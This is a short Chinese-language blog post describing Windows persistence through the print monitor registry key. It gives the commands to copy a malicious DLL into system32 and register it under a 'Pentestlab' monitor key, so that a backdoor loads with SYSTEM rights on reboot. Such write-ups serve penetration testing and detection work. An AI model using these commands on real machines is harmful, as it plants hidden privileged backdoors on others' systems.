1. 程式人生 > 其它 >修改登錄檔的monitor鍵值進行許可權維持

修改登錄檔的monitor鍵值進行許可權維持

文章目錄

操作

需要管理員許可權,將惡意的dll檔案上傳到system32資料夾下:

copy test.dll c:\windows\system32
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ

效果

當主機重啟的時候會觸發後門,且後門以system許可權啟動。
在這裡插入圖片描述